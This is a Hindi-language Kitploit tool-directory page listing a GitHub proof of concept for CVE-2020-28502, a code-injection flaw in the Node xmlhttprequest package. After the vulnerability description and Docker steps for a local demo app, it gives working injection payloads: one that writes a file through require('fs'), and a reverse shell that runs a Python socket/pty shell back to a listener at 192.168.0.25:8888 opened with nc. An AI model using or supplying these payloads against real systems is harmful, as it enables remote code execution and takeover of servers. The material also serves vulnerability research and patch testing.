Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2020-28502 — CVE-2020-28502 node-XMLHttpRequest RCE | Kitploit
उपकरण/GitHubGitHub/s-index/cve-2020-28502
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणलर्निंग और शिक्षारिमोट एक्सेस टूलपेलोड डेवलपमेंट
GitHubs-index/cve-2020-28502

CVE-2020-28502

CVE-2020-28502 node-XMLHttpRequest RCE

रिपॉजिटरी देखें
32505 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2020-28502 node-XMLHttpRequest RCE

NVD विवरण

यह xmlhttprequest पैकेज के 1.7.0 से पहले के संस्करणों को प्रभावित करता है; साथ ही xmlhttprequest-ssl पैकेज के सभी संस्करणों को। बशर्ते अनुरोध सिंक्रोनस रूप से भेजे जाते हैं (xhr.open पर async=False), xhr.send में प्रवाहित होने वाला दुर्भावनापूर्ण उपयोगकर्ता इनपुट मनमाना कोड इंजेक्ट और चलाने का कारण बन सकता है।

डेमो

cve-2020-28502

सेटअप

  1. Dockerfile से एक इमेज बनाएं
root@kitploit:~
$ docker build -t cve-2020-28502 .
  1. एक नए कंटेनर में node app.js चलाएं
root@kitploit:~
$ docker run --rm -p 3000:3000 cve-2020-28502
  1. http://localhost:3000 एक्सेस करें

localhost-image

PoC पेलोड

फ़ाइल जोड़ें

टूल डाउनलोड करें

पेलोड सबमिट करें

root@kitploit:~
\');require("fs").writeFileSync("./exploit.txt", "exploit!");req.end();//

रिवर्स शेल

  1. क्लाइंट पर सुनें
root@kitploit:~
$ nc -l 8888
  1. पेलोड सबमिट करें

ip पता (192.168.0.25) को अपने स्थानीय ip पते में बदलें

root@kitploit:~
\');require("child_process").exec("python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.0.25\",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/bash\")'");req.end();//

संदर्भ

  • https://snyk.io/vuln/SNYK-JS-XMLHTTPREQUEST-1082935